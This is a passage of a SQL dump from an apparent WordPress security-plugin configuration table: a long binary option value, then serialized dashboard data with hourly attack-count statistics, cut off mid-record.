vdGBwiJOZ@-.qJv\"(p{v;fˋ &UuuU^$d`v7fErR-yV*LgbJx.g0V샻ZesWTm^\"QќG(͢eK@^(1]!\'\\srKS#A/\\\n\Z\0c|ffś<=!-uW=T\0cᄒF`ŦO\r+\0A\nN85p BbtVV:Ϩ<(yk^m<e6amԮR%M1;@t!0%/;+(݀t\ZU)t	-b[)>\Z\rg6H\n w28+lroP@s>L{4`DMoaYmytP*\nDճ0AA\nkz}*$cS)KxX1Ӽ~bݥ9wEE3|:Gu,vlȾltdA4f@HeXqƁ\Zd%\n[Kn0!&^pƄ+nT\0o<\\?_.,OӔUƐfB䍎C<Zx0譃Ɯ5-Zdn3I\rC\ZHcAƨf}>^zTRsEy:vʋ8Ư<1ֳ-Pf@G\rGyƴ. g]Jz`$LKf<ƴsfOC|ut=)k% Ya@ųtF\\\r?vWCYnqC}8|M\\<d^\"ą9ޕANĔ򜜠\\bZ_uC,PI1[\02_H9znD	rY[\"?\"Zc񦱯g\r~ ǐV5?B $i1a0EQaQ2F\\>0/.\nw\'O-\\mo}%-\0{@\n{	ݒS/-6Rӊ\0Y\n痬}K³Z?A,\ZYum<slMaPL/+vwdǁSzQc\\N~(fZFJ~\n<ǔYMgE+UX57HEht6sǣ@x?LHexݸq*a.dNGkNךP\'hH>[Ұ[g-d9#	35{Gg{t<yS݀<N!)vX^\'P1|р8&dK]	E4v۬>t&gk\"\r+fUʰ4xY*RlգzUc\n5Kȷ84]$0T`1oF\"&\"9 (jqz&̱ȁuƧcujӄltȃogQfE-fȈIy\0]Qἣ(Ͳȵ08S9M\\1ִnហ/{4ȻIŔqd<Plm,9/,I;?%y[.]_zaZ%U$DW-{};y*0՛s:@&O\nov#Ͻ0D##a~7ԺMާ/<]Ft֏\"O`3vTlΎ\rGW6,΃_{*O%EHL\rjMDѝbSF\\vl%\'Ͱ^3E>ˑY,XRk2QLOP(m|9pYuc?-F=DqJkfɢ::Kq35Fpu@ɮamș@DmPJɯ	j[IY|ԲbX$nG>LIɴ߁10Rzʵg\Z߁ԑ7Ȳ%B]g\"`.Eq-C96q <R_\nYBbS\"B-+GQJ2~snm1+uf\'sOdNtk9^{sx*X\nbsQh\ZP?Ly8&>IB+awqˏ\\N];L?sBis(܀zHO?۷G۠ԙ>Z	~yg-Gyvm\"GB&i7qʥv2Z}K_	jIl09Rʱ~o2\0?SV=ZsLMk;PhJK{+f0|#8:k ߪGG0hdr鎄\nljs!~BOl;iKe?>VPbAy+L/SՌ$.bne͞BxMgFhW~d\\1a\nTp@ǘvDz|3E6E	j\\P(gC?#$/TA}\\DU^\\m$Io*ẾV\0![ #އ*\Zmhp6o8d9#Zѝo\nT#t9rd77:#!]6I03ѵ!RYBUxlrXwc<z!\nbOpL35pD^8DX#qֻ\'f.N!q?M*]- y3,4P9ƕˊ%(|⛩vq\0}\\lnˠ9HǱUhLgN{1W(w\n˺C\\=vpOW)[СM2SS{zb-ͨ4]?^Dk=3!Z=	kB§*PyX&%0V>\0VKN\"KPK/+R$f!띁>7Mi_\"4	Zg\"axh\"\'Mi55L)\\eVA7rdmĶbeT,WMz(=ǌ	<5/#PNgz\Z&x?49<c\'c:y4Og8ĲFG\0\nZ7|Aq+SO\rz~(fYaιy=A\r`]Ƣ V])#dOX1reT8k,Yh\\cYNiT7v1X~J=_[i\riJqo2ҋe}Xto|zJHް>̆Fñ#\rb48LI۵?2}̎1BSb`;\0&:Tu%f^ځ5̓>-Pc/srt)xK>l$,\Z̚Q\0u4J47:\"R,6\0\\̨tX\'Jܳaim>#Me̵ *o2d*_6c\nzpqJޱe X{~k\0a֒9pA&a&J_\"OTa\nS.7ĝX`j\nf}DErFJ?CNТr7eAVk];YE䙡m6%\\3de\nu8K8BTI)W\'|=]m8ŉn-`u&tߜSuj2kpW6{0@\n-t9$-VrTsYݥ/h)`63\n\0fByjZi\nFغ\0 µ#7fhCaT\"ё^>2^~\"-I-.\rQ1*a	D.6OG\npQj8.q}PҝJ:hQyyf\\u:66k<RV8:xȑ͈{g-Z}^0:~+>x[Pͨ8Q\\fMJJ8G\"獃N/6j)RV9 yORvnX3f%0y8x{No:KѰy+!1EÀ\'Uʏ %Ix`Lbɚ[_I%ǆm_|SLha\'\n	(\Z\"f_i\\G=X1!54V?g!٩!_#*B	:_$̻{ϛ@]ӎSC\03xS\ZN| \"hek>t3Sm*3^e9|#U6UOTbo~s/.yN+4[xV5+D\"G{\\u-TƩ\\Xi{ !7){d2SgzfĞMJKKY1ΎuL%\0M0@ΕN:9R}5U\\_^s\n|Η)nS&[{T.6Yi*HY_Ψ4OoaR˯^Nrk/5έwJ.ֹ҈r~w=4jӐήOOy#MPubT2.tٰ݉ή޸F\ZgTi0bwiIL\0ƚ|C	&M6\"E;i`n7(}9/#T?DPX`dӂ|ћ:D3CSCklStUa\"6kHDUxKU>5Jʧ-LE{_E\0	RB}NsEC%\'ۓߟRf?\rUne\"4\0Cp/5|X@㺪gp.\n5_Uqڠs?K3^kǧ!\0޼L޽\rbգݭ,luݚ>-:[BǓ|*Cǣ@χ87!\"(Rϋ2\r\ZaDD{oό=_}+~(ȞevrC[mKϸ$a5QcVjv`dmmYQ,|:Kʒ%DL#bXWbp?\nQ@xHc*XOLa/{ؒawn\nyLIF)|#pSRNbTismTJ{)Aon;9%n[:mtog87PvZ:EFMs,6Lb!G3Jv^5K`GCЎLX]\'kAm]J7MBЙBz\Zk Vwnl)\rМTсFC)k|WjNɩZ]/e{вe^K\rs;SeD+Vc,/Nо;c\0ׄ5s+{u7^߭kF5-n!x`Oksu=J$u	8@Zx`#)+poPˤhzY[|`;]X˖<Rh#IJ* Tq\0t<bCK7jBYCn»̹)B#)\n@}nF>k7X*ve{}bIP0ιo-jC-WBBusٿ	#g2&*<Ԟ1V=(sSl.B+u\\ۧ-;-R8kp4C9RWJ̡f+VUm9jODzq蔷g\rӒdK:DѬ.AQ%8;+[}2\0O\nqbm~	+jDŧɽ5h\n`\r$%eG\Z8	cb#k uh(\\F#jW7\"eKCds2R\'Y.đ3E9D>	.2,!YS[w\0m0H+\rq(2=]$ɆpLdGa2x~e_Za5ڹ-{UVdHrV(-W#Q?`GuGp~n-ғDjkh)fxwLQғsa\"o?Щc9CQ-yj$ieYi{p\\8ڪf.$FL6wfj\\iAxkʍ*^D.oR|D9O4[J	\"<Ɲ2,*5pGE?:zM$qeƭba2E!tdgj\"Xks	&Q=IjEN7\n;R}lpfVbmmhc\\J~9HJ$[x[֝~m/ȶ>ũT.),l;;o[ӆˉDgu\nY2.C0ÎM(Ӌ;sdO&hgC0u![+\0Ӟ*سjEW;>$:̈4dQ+aJӨ+`qs{9OFxvNms{Ӯ¾&j\0vS|.kӷĆ{线m-a.GB1n:sӸ9A!=׺a	LP:Ԝ̶:wyj=ҕī6xySy[9l:Z=?V2T%<΋̪ѬJb+/?B<\\|8W)\0j|(	yz633Wq\'x0`CAW\'>ݩK\"w-\0CV!)3UէyRԜI|y\' vdŌ#Ϯtԥ宂EO1\":9(TQ\"M4%&rOfA[Ȳ4ɏݐqU}R\"GǄLg+\0vQv1R2ߡ/Ɣ~Ϟ-\\ \Z@G>uyaxn`fw?6y}>m\nMR\ZVyf`TØ`s[|CImyu>j\"e[8%\Z\rˤ\rN}RmD<k1\n%D{RӢ\0M+2Ӣ;\rM@jc3.R2-OeZ}{ 7tBR#\r\n0f_`۽\\\n}(nawC9-AIQED^Yl2Jjf\"3zW0YP{{yTzwyjmˬ\'fښGĒGN2*RmWF~mK$QՎ1m.JM\\kV?1 [`u>\0!,Օ>o* ,_wE]I`[3Ֆr\rGVpGG݊X3;՜5Iˆ3էKnLm\\UkJصlLզ`A^{Bb\rN\ZJ>#\n\"7`)w10.^Rb괚fՎRS\rG4(!OX*7Al\"8sՂg\0[ L;:w?6)n\r}&ap6fK)^o灐Os<A63A߯%wZ5-Dڼ@JS\\<Cޏ=s\'WI&\Z(vaToO,\ry\"ƺHoSvP	SKwcpU%(lfU}hp2+nDʭֆvBǑdX 1fvHy)l֚ă3͒\rΝĹTN3_*.֞&ur|i+Q`ŸM1U֠)8l/ZR=YpO2Iu>&˷uUĖ{kdo\\o~(y&jF%@I(.#5U[֋DB@i~1\'7Ö\0W2jʙ{`/f4\'3Z\r701]!֥\nc3*aVֆeƗԟ9ROt\rC_4czSsTM)PHٹkώ%7f+$.~ӛMxkv\rns]%́Tĉҩ^{Ǝuj-{V=O\\j??f&:s[#RDs;ʅilbX.-t/ykOՇ|{W9mdJNRj8?|H!sђi{OT6{z480og3xFR.:+װ&䄇2C.aeE0,9\'ZS54G[\\e}*<|L;zxx?&WFf=x;Ҹ.uL)Ԝ2dL{035Y!U\nhq\\DGhB,;b&<C$H\n>TEGN`-*(q#ԜD]KXJnpiήo(F rr^$O5M&JDK0FNw0\\Ps-\"d,世n7z:nSKn؎\\X)Ш®4ʸcWþ#E5ӂe%/h]޲#ш9`vb9N/lRagLwԺQ\'b(c/:+~Z|\0u%rvBT iނNɫ/=1IDj0\\lM51(R;\\gՌe՞$_,j薶tC@ϊ&8Haq_/BuZ&?y=ӡC6d6m\\]vayT*fZ/8߬U(WU{-V͗8$4l\\L4y\rotf`8^`=@lTzŜ8)}~H}q٘\"[,T#H5\0F	\rRosٙ$ѰRej`^7葟%yٜM9\Z/\' ٞ4bVttkEp%~D`%\0;ٴ M\nWX\n躨||3ߜ++4,ٷ紱1]ֲlzbVPx̜=ŭ?/Č)-\'Lԗ x!Uw_nFa>e3;vztPi(d|\ZVw7BAzzMk+O5@&},pyF(%Ld\r*n=YNt,kL]*]>N5c	Ynl)\"qqpuu4F݆$ӕ_p~*60#?BTP|:X\Z@d\nf!B>j\\R^3VcZ=.\0܈\\\',(&M1^t&*/:7`P\nS!:b=.#R[$V<Z>f+mսRh_i;1zm6@d35(G\\ܧDoi	Pp*vw;X?=s|VFƢIdE<8mJ.Ewj#_\ZܞfnN7U//g#JKӒ]堹|MnYM\n}2 `Qv_\rzB^=څc:ܾ|@l\'e߲~چL-u5Zkw=03O* ;XJ\'z0ګŲT\"\\S@ޥ+0yrx9M,ڮ(\"Y<%I 0c+	Mv1ںQG䃞uGiԯg#dN,֢_5^W{KbFyPXp^Mƴs>\ZH.\rߏZ\\UDOtޔ&ŔLZO\Z4vdU==cx\\魞5\'ҵdջ`k_[aJ{p\ZE=(X\\s	pJTX~\\sAk\Z-=}Fb᜾TEw!}a}.& c-B\'Sj?t6SzåZ,jۂwT\\ +=ាb\'^xK.ۑ&\Z錷ې7~rbۣ԰<К~_m?##B	(ۥ~b%w\0 z9wsn>Dy1ۧ#)\"UGܑ]ۭM:EZ<v(@^eK\0۳}sYDk6M(kGNة\\B·Tj5D-8FQ\r%.m5R㖩\r;gPklr<CD0*\n)mx:.owpԴ6b@WFk-1q[42\Z@r: ӪNlTD,\';=%~	H``@}6[d=w\\+y%e-_+^J6^NihOJkfiBD̉I~.lvPgwv\r\"aMI\\P;b>꧒5>7Dublg=z^z)t?Ū鳊<)+$>S 4h\"hAD\'\'|6[kF=\nyifmR̗Ui؜!YhLa门b|\r,7@\\\'>0n+SK&sщ\\;Yq9wm3t	ЫQv#`i-1ٞUhܑǣg\n4 ]D$WܗEV8֋i;fe|ˤܝ.rYMDMKqĹzZpܣxL#!E~p#wp1[0L\nܱfXI`&:=^bKG\0.ܴ&#kpe`򷪱hfsIXNk:K:\"$_\ZgpSI{ǫ2jPfGi+YHK׀&f8Hk[%mrs+n0Of֠7yg\0x-8EmbE\rH	Zm\"6N`! B\'wCˮ.0{\'~K.sJIPګ&nR	2JX}k;\n5Vr4݊w?L)Kf4ٺ\ra~tnTݩzKuY.mi4*UTݴ\"cYO|D\0;.Ѵ*Nݿp\\/h#]\"\n=/MZփI33unM5Kh&bV\\%Z$iC1~s\\6rۘ\nΣ6tt|hfS?f_z`y(H2\nyπ8FpBkʫ.E\"y3(ɝO6Su՛Z&S,	p\nb!s!ͮ]>\nOj5RLCIeỔJe\0.SF>.wg:$\Z	V8{V9/jzbbhF+\0~XtǞC{%f\"Z_m=Z>D[{/m9qN9wN|\n֥sj*bTO5pp`)ޖp1iМ&19ޠ}D3̲ޚ$>*~wa\rxޥ\\}9QZ\rHO\Z+C3\r͇q,ޱ\n1$d8v^!*3#͜v@3&hN;yB\ZN 8	jxoXQl~?8ii8|LeI_y:&Rz<OT%x\Z܂it11EgU&21YI\nf	YᦊFrL7uSt֗pǯ$U-m ~V>򘀹EY\r,iՂ!\r2nD9T%T֖\r>ƾR<F{;xپ۶Ix3\nzǖ۝Qh-n&Ue\\Xj`nُ|&k2ʰS|I߆Ryrv@|z%Ӷp,ro;B5\0CyaFvVNcۊiBaTfX|jbdPCW>b$=Otǐ>G8jj48-sZԏsŝf?߅yRz5T\0DU磣	w̯ߌ\nrsgɴ5Z}̼ߌPܻ\0{QЩ#m,x\\`ar_ߔ}>&Iy	pby18gJ\nߠB.qf6*_-WI4K2ߧ)sg,He|\"j̋2(߹VNA=X\".\nŅi2~<gqԴTϗ~%>ԍ6m_5};[IFi|x7N*TZj\ru^kbڵ)P\0[\'.l7^\r?%RcIglQRx\ZˮR-SZo3ҳCAj	M^2ɖ<tfp\'P6߱)u@SCom94]2IeEkqh@N>އ͘RRSo sByc!l	MJh^`7Z=^ԯč1TgرDwhlԑ_x4\r[	\r+~\"j\\粃h_EV\"R҆c}oiӿFp&KIPʽD[E=3iJ[ax(aBtgP	B\"(QG<C<F\Zm_=|kBô4>]Ffw\'欚Evm8aĆJHڢ#eR7\"d|CC0v0K\r-p4,KY(I xDQ/tvǹU8-4J\0)Sִ?k\"4Z.Z9\rkXe_^q(ѵ/̹h22&Xt-aZnmsNQ\"?mFN8?pi\ZhHz᎞O,khiYe8;w*Aފ&\'D:5`v>dk}<6 ȀKB۵&|UB\0Y;@7GJ۽揷+I-i3<e\n!d>a%+eT7 ҧgяd,w=	{|\ZZoϢ.p]U\ZeOlP&A{5/w?Z)H%K-xrNpꔨ%$,5%m,\nu(ޞw0KoHJ,a	rU9\'s?|R0AtRWE )օuTRYT6r\ZIZ)[w[]=`LÞV GLmJafo\0We2`:Z?^X=Gγb<HGwE21wha3(J@‵`iz y}fWmhGmM]H\ru:4̩i7[G쳙r/a4v)w}U+谆{3⥾ϵ瑉N)]W1+Z*ʠu<e\n,&ͭ1:If	ڦ%5@Q85ʂ1-5ymn*$\\lG*EM\nl׭m[-B8YٺdJ6S.V594*fH	r*\0Y㱿;+h<RV_u&R:ƹW\rbCJ9nFB yJ/adVBZLC;wxY^-сo/@87?!c^H\0E*Iz3^MP4FlwRCH1\0H\rgf^Hq*v6Mg2IYg_,\ZI.&;ӾrV<SgU|4E+5C828ҝo\'?_8ۗ0]$47F\ZA#[RAr57{07f=9GcNyΟor|A\ZU\0jJΆPM6.\n?~oΥTXJ)*aL#Vŷ42B2,uʕn}~҂Z-36	>ӯ\Zz?<^޺%8\"yٱOlB=VGh!K<Jq;(5nOjnYZ5qPܠ4zgzBtWnW&c\'J@{Trq	*kJ+0}VLf6	ӆ`lI*H?6G}hoB %L@ĥbu(FHP\\ȯC9!cnN*NJg}Yv7Oh%.\"AX*䯂:roO\'7x9)yj?wk6(.Tv̯15Nb7ٳUw*)h	+ڞ\n)QNkU4JM\\V^1urYޥ1mwt&Cr\'BMFu\Zx/D9zH&U>+TKF(,`:7QǱ-FZQTƷn\r{Puυ~\r|FSa(J}ȟA\r1Pxzuѷ;gtS7Gn+Q1rgQ yg5.hfhm;k W8ˉntAbyMϐ;(uj?]$C&eZ%,zfw#nؔ50D*/rxPgb =#\0M)B\\eCAwwKHY\"0d~k:\nYïy.5 <ooP?DO%ڵN:({ZӌUJk#HT]^U\0Tją[ƷGֱ!IzA4N:ӊU	[y-)5_Ba\rc;pvgm-,_\"TP].힭j8\\3c\Z^@i# UcjHq.!۴	^U\rs;m幡F}I-6n$[$\n92%V0D2`qT&%q5y\nVڌHt:<k% (1.pIueIt9]\05^\Z!cxNdiGeAI@\'iۤz*bTJ-2<8Ko|nF&Q It-Z\r˅HF wb9ѿ\ZxRcI0{eQD {~aK\\-B\Z](5z!UN[a9{jB0PoUKjaWś\'yY曗>@-=	g_{-SP+fQp87i!*I6Kk	oyAw)}\\C	\n=Չ{o׶gbUh6XE.Run5jO\06\ntu=5Q%Ǜ|߂YM\\JabTjbGarU~\ZoZ\"Tɷ\rM +	`gOl:l}s1iJoZ3w/at?\\piEE,8)Tn,qSFzȲMRW3\\\rq1?XEGDfLSq`	ٷ炿E$>96g\0È];l\0l*\r\n%E\'tF䝆煶\Zf=?;[%j{jMa7痰fWeJSZwkXڱӍ~\n}@=\\YYC]Ǣ5cZ\rlYq\n\")\nSe]~&^vwŜv|چ`z`I{zC9]W9Ջʸoz=pr7\0H\n({S=gkyo?8Շ|BD137ţ遢\n<Yz\'jX`frQ\Zȿ4MF/-fr:CK\n8]PY5Hgb:<xݢX,s\Zi(6貿!gъk8-dxj)dmx́߻?9ݱ|X!l%1+w$5Jck!ԛHFfK\ZR$HZY\n~P.x꜃ Nî(gFw@Ya_^f^(\rO>踭,\\qr*Llf<w\'1m[Ί9 PxUrGEs;?ݚd t-8e0W~*>< *0V\04~tUgLQ磺1Zktx*5I鄳~㾥ݐnn\'-҉V>鈢ڛr],?i(R;}>QV!yvpc̒P`-e9rJK\'t>;髥ħgZCJo*^ɰ1NJRiBOӬBVhpC%Z}=s<۔[Z#g *\Z;1\ZE?Ic_c#ňM-[\"nE*9p:cZT\\:_&#`Q\n.	.E@ю.%Eg=N3>g|S(FjǕ\n;eX4PievWsoڋLQBWbexAj,prkjVi]A\"3#q Ɔ\Z)+l\0#<9\"ϕAvhzJ>AqW&zUV\nW8 `\0ayxHõנcΏͿͰ9O8^^]t*f%YE5<`Whj0g_MTJ\npc[_:E(.)&$*~(gf;c\0̢ce:Hb>R@\'=v@5)y&֫\r;&؛ƿػ5|V{׾A\rreAFzK`\"?EzcRz͞.V~!6k8W\'|ǘrfH	/A.ya餷#c^SA_7\'hcv]#\':zKl?Yk2W>-MPN`g?\\\n\rK\0J<ǘ3bxT:W*r-6fpxc,hoNI[\\`nB7$·#t\"Sm-C`ɊsE#)(A[h\'|kaOIh9A\08(?K\n͠ZNtaZf+Ǡ\nKbLDL94ݬJ݃ClE<aǈl.ēz]\n\Z:zs\0nĽ>e[7NJtt@`2Z\'SV\"*XAvkOxޡmdFFÅfa+6)rb4ʲg}SxvֻaʩD\05SS-*^Ӆ\\w%`0vl\r\n?4ɿr֍On_4`/-\'aYI|6`Z4\n\"l\'U8ykSlصA(GL8!<zKriImVe(iCx/?OEqi7A:3\r:?2=,+)̻ng3(Da!_y	QVGK҂sv@N\0}AvA$=08Qj`\Z98Ra>rZ!e%duH/l+ޠ.I6(웎yRj\nMx\r.s΂&쮝yY#ǳE	92vnjs,_Y{\Zk]ٛzJ^z{M9l+:A}00.@L3l囔\\HiܵxfLl#@Ťe+׹=So\nhѱً!J~ẞǡɹὙg\ryuCx;P{kyM#h.?t#ɠ\"z)`RI+_#ap[o|\':@A} E饬2,)w_DʉԶ͂6j40FSc\"~G8<\':M6/U9)OWT>S0\0;QO%$K	\'͕{)_ĝ#/q&O[O\"²,l?2j&,k$t3?iYϲYڷO5]I{ٚXLl#,\nWMbXzp)\'F{Pniq9o̳l5y9Mb&iKues<%qѬ6IF_\'Q73#5XNxL+֖}	gTj,)0f;7p>Dy(-s\'#֛XމΆ>풏9Fܐ𱐠dְH]@ePayŝ&)ԧ0x)/mۅrUz&[j}wREv{AG5Fi	y*dq]OX=>j*욬e3p]L}``DX1عWJ]cƈf	uJ0fj\0ցsZR~]*\"rdS2!{֣:=Nzg&$F,lK급/Í9zÜu\Z\"dm*\ZX͹[I|4r_xS*t^&/\\$r\\`ʳa7%eűCS6ǀh2.^Ww_NCnd,ypU~2ʩw:jU/t#L\"utPw\"Lx|(.ayѫu#\ZڄeuuI;o,1{[rѸ5b,B2+YGHQMp+i2vCm*iQLCH8RvJjo޼f2RFt	{[Ob4?fs^Y\0^%mp2X[j_aGv@2b\\\0~*JjT\Zw?/cg)eZ~&qN7 Z-r$E\Z3b\nNyoHNmQvaN/	Y!v46]3]3<ڗ<*=t󅡢pEKL[Mrx%\0b0qqĂ|x:_V5:USo2ҾPuA_*}~\'K9;4p\n+=UO}6Ԋ|}<yﭼ։Khxޫ(R1=~PwºT+In\r{M_໘`3x4L#\\rԹF \"$qc@\nCKnAO] `oCK.U8uiH<pShZذ/\r.O}9fPko2,=A}P#\r5k,PD+>J5딧n.\0URqk\'i_i,\nG+L.\rQ\0%\'ym_#?E1\0² 75mw>Z2Q2K=^NqQ\nIS}V#N7=ɷ5gD>h]3\n0_эWg1*VFIPxfvL@pR;KR[:[*w(1 yjL3ˇd\'V&}l]dOgV:5fHA~l!/6yԶ![^IٷO3E}{Yz#@XaͰ]()ck!~s~hq0X?8̅Hi,+x͵SE^>6\\V6 Ei*X,/6}%]v	\ZY<}]8c4=}Xj(	;wgָ,\\R0$koA{2#am\'Y#O(&\r\n0{z7jRv^0?2Dh4SG8RHe4ډ3z\ZrK,IޗOexџi}.kQ_39y\nb-5c,R3\'r.]9cxߚY9\\~:Mo\\K9r^K;IfǶhj}upIXpھΩT/6FkTE;H	#ߛ{C\'Vۨ/H_n{FW?^ծV N	-js\Zjh߽CșIEbUa9e׽RX?楐1ih\ZҕXT9Eߎiц	v&=GVkr2C5m~q~;rfXᅸeXtŪ.+[咩H{v./s|UZAh$DUsI{\'\01rkDac#kQbm(({ia^\\vJMC`QA6_~jc,1F\n)7䩾!@	nK^$NVjq`JBZޅJX0u9>!v1vą>Ш&D6X]`=(fy2Э9exkzB46Hy/=u4_c	ο\'M|4gE;+\\)Hq{@dX{a2H=G6Cm:|!%p8Ug𿌫ANyqoʅ#&]#mVەrȹL=6mzQhZC TαiߠPom\\D5~!ЗeW_6|T->{rC\n=kRdj6T\'3H_cxNpnx{V@f!D.SJ/xknZ~q6Lꂨ$?{II%&V(Aw<䩻c$a=!3CPY.c%0b?O)Mퟴ[%>xd]?Z񴝞15q)9W/`kWV*_i_\'hMaCQW~K0X~D<>5O!	U\'IaӴ9+6fF7r,?OP\Zr(gau;YR>v\\?sk\\ ~mV|ݐ\0!ٖX6av/%1UEd_w\'ޢKGs*<vu.SA`\n	tp\'\\ˑ+&*u4c	\Z{\r@l(2u-VJˀzا`*#jxZ&\Z{C\rB]Y#<\0!_M~(k_MWFi]iˍBl@j!\0@Ų3pv`r9H(cWޏK\"$Gϭ\'6I\"Vɜ=0\Zh݆֭<e1L!ӳ\ZDKi@*SĘRg	rz2,oQϕFUlt*gV☲ù۬BjLNhZe%D\'G}wEk*	W،j|K\'lȈ<fdUƬ\\fHvIIwd4\"醗0_h^1-cjHtfݬ?D)\'hcF,4|iQlpt>%y1PbBR[B}\n[;	I2qU>n)̈́IxVV$Z=qUOc\n4\r\'R28F(>F2 \"Qj6h\'Vh~Ad7DcA\ZHzyIQ]o%<DNNM^^/jC9tbp\r<!!dep\Z	0mz%\ZN:J0L2\"L⯜t%>:1WRͩQi~^Gvr`G̃S$ 2|>YwMW[ I/H-j\r%D+P4g.{^W/![quT &gɖ\r.:)Q7ݣ h\"bY(VW|/5[rɷ*MlrnzWm:fO&y(H\n#_FD:1I}U\"\0HB&`8m!Uc%rT.qx=\0\"I8c_;k6RrE?{dG_A7c0+^Eh1{9U,%k1X\r LcN;<K{*kLE,t*J.	*歁\\5c%aPTgxȻ5\"~R6>6)=|@ ԃ\\HVq2v5o,\07IѴE90.BAe4>]ySPk=9ifCu	l6E#Zt,#<\ZL4ZZ<&^SV?RÊ]	ͮ6RԤz8\\4wcysM)9@2.V/Bc5a\rRIG>?y;+\'SAED>qqa_؈K)A/YQ;#6ycȌʗjL2-[ 3]S.\\0הB/\njz\'aFL\ZH-L	`$p1/>:rVǙ=={OrRxgJ9G0>zc&IÆb4~*LQRkg!ifnb.*η$gwT#;?`?;\"AY|X;uaw?oabN$gI+R.e\Zptᣈ:\Z`\'8y`wW0PRƇ]Pd$*H9\n?g{gs	gOXI#n!F#Yȼv\"|:ݯCG#\nYE[Vwi%-%F\0[n1Sa+]BE2sŎ)?ԟB	*ZOےn+z`ߗ]^$dgGfmG8@~n?	x*ՑxkS략9URݼ\"EI {`z$쨀qZ6hֲCR=8Hΐ<>yy= ؃Gө&0*u\0u\r+M\nMƿ4f_MG%2q0/ғ:;eWGʈP,KA]H%AQD۞V蚹xRBBy%hWvǶm}nG. Ճg?rТjs$_D&֗H᝭s%vx-#?	T5)\\Np[>&]:.ѥׇ4UhnlhʫjF**\ZWnfrP#3w֢$¡桘3D\\[IwD=O$l\ZI9<0ox>L1\Z?f]t2Ј5IvC(߱wziC\038\'U$S(]4PcUv᢭(c̈́ɯTνڐ$_SЊ||nD~v-;&W0;7\"L~ޅLE`!)lʛhLO/̩3z4ΚC:Ufz^^Gn/pR1C̬202J΍<:_B!s*l6\"Q_ȹ2a7<\\U}\"As?C9`r0É\01yiN7,N]8ϪC,01Sͭ-abpYx{VcolNGqlkbañԟyb@Y(J5}׸dt`MuƂUz[w\\=ʼ\0[\nKix-b>,EdҔ\nN-\09pM0+~0:6r½c	h{M\\J,k\r?O\Z/ކf?xȃ9\rQP@\r\ZSz\nEOwF.P)n><WS)_]Ya\'kY_otr)CEIm/;ggŭƱ0`8^\\Ƌ~~J7$kSsYme(|.ŹzZ[몾lc읋qoןK֛+%؂!a29\n`F_h*y.ZۭP0\"j=xat\\Kh9wǏ;Z)K~Q[::js^Z@2nve)e_u!9]we<΁iJkNBSThZs*[?	POvDŌi*b*;ةDڨn/Nshwk1]\':&etbt*\n\'Z%$^*BR_~;Ak8\\=>J1~(Acqo%TFO-GzJTN>\'#.D=a:\'jK WHS`\ry~E~|\nRi)fl饔e})ld*ÀIF^ȯܒW@~ݘT`l 9睪PkKVd*bzHpf?@јݲIG]qM;>l\nA>khR8yOtldU^E%On޹~}qcs @\"/š|sP|0ô!J[h7e^JTuVڅ6bJR#ԲYunnOc\nizNy׊}˜.\Z^\nx+U1wz)\"4+B\\II%%\"ЖX~X4;;]*	&\"TQWvRid3m`a3\r45q$&Β9QO*zkBjdE,TgOrP~tgng(W{v^Z}ȐC6ݞ+?۸ZPd?P\\kO}H\"F+:̵LZKAxr^/\'D~4d`8`qr|\Zゐ5bT2ph=j#jR	𪏨|z03ܸOV1SlfwV1	l?.\rƨ;p-e*`[p5Uͳ{n!z[>ft4s^tE+WLկCҩχHhZ;P.s.1q+܋\r4$PduU18<KnspGRb:L0j}y슟WSh5GH;V((\ZB\0\rlŗBs#3?+WpPMk]<px_\"RLkiGGPP(ϞS3Q?(H|,;pH@yƄk}{[W{LG.vOǫ\"M\r6IcE,M+,ǖf MP[Y&\r,YDxxVތ\Z~VDZ6aW_tʩkgi\nB_[\074w5qy1Щ3&Ttȹ8=SPyYmmUIOF	!qO~þ`Ϸ7i.KK;3@\"_d/5%9U6>NcVMTpW \r0Z|\\T-BD\",Quܳn.A\ZXm,P\rJhxQ#\0tgFNv&W\"Ĳ}:kS-e&sc1hؗ]m3ĺXqÏj_y[+xEV0zxi\nF\n74欋\\M=OhL;-F\0U*/d.>z_MEMՏ-/v_څc?,U&\"R[R|L<uQRVxs	b[yiC\0Tq@W~{ṜgIU9\0ڡSwq\\(LpR^_mo<e{FEP\n-,5H:@\r%-,$yk\\3딢ߓ{B2AG<&%߼w$cTV¶\r|f7hCp\Z8wG+dUxXcѨV*6i(HXw6[|JaʹЖq^Oh;xA3-\rhM>kv7[ׇd̂zR<2K7II!1&j[656i8ntl*?/]\Z4tX*52.p·\"F6Zؙ\n$zz\r9`\\&S9~{-LKŝITi;u!7UeH> -%G(m\0DO;^Klظ!/?aFz#U%f{xi<f;KZ9ްNWj_H]͚VIR[냛Bk~P,oʂ-~Bʾi>1/##yXoa\\DŞhebh?)31us_sШd>V*R/\0ӷ~r%\"8lbκ\"7eE=n~͙\'2C/?	CQc2 Gehh݌^@˶\\},nۛ~AF,{<nн>!2_Ud~p7O\";}`#uT\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1567010051;s:3:\"tdf\";a:3:{s:9:\"community\";i:5699;s:7:\"premium\";i:5707;s:9:\"blacklist\";i:14360;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1566921600;s:1:\"c\";i:4599901;}i:1;a:2:{s:1:\"t\";i:1566925200;s:1:\"c\";i:4522911;}i:2;a:2:{s:1:\"t\";i:1566928800;s:1:\"c\";i:4342635;}i:3;a:2:{s:1:\"t\";i:1566932400;s:1:\"c\";i:4245749;}i:4;a:2:{s:1:\"t\";i:1566936000;s:1:\"c\";i:4250536;}i:5;a:2:{s:1:\"t\";i:1566939600;s:1:\"c\";i:4390921;}i:6;a:2:{s:1:\"t\";i:1566943200;s:1:\"c\";i:4096079;}i:7;a:2:{s:1:\"t\";i:1566946800;s:1:\"c\";i:4246410;}i:8;a:2:{s:1:\"t\";i:1566950400;s:1:\"c\";i:4269815;}i:9;a:2:{s:1:\"t\";i:1566954000;s:1:\"c\";i:4260080;}i:10;a:2:{s:1:\"t\";i:1566957600;s:1:\"c\";i:4425321;}i:11;a:2:{s:1:\"t\";i:1566961200;s:1:\"c\";i:4188060;}i:12;a:2:{s:1:\"t\";i:1566964800;s:1:\"c\";i:4255379;}i:13;a:2:{s:1:\"t\";i:1566968400;s:1:\"c\";i:4364737;}i:14;a:2:{s:1:\"t\";i:1566972000;s:1:\"c\";i:4614014;}i:15;a:2:{s:1:\"t\";i:1566975600;s:1:\"c\";i:4742703;}i:16;a:2:{s:1:\"t\";i:1566979200;s:1:\"c\";i:4883870;}i:17;a:2:{s:1:\"t\";i:1566982800;s:1:\"c\";i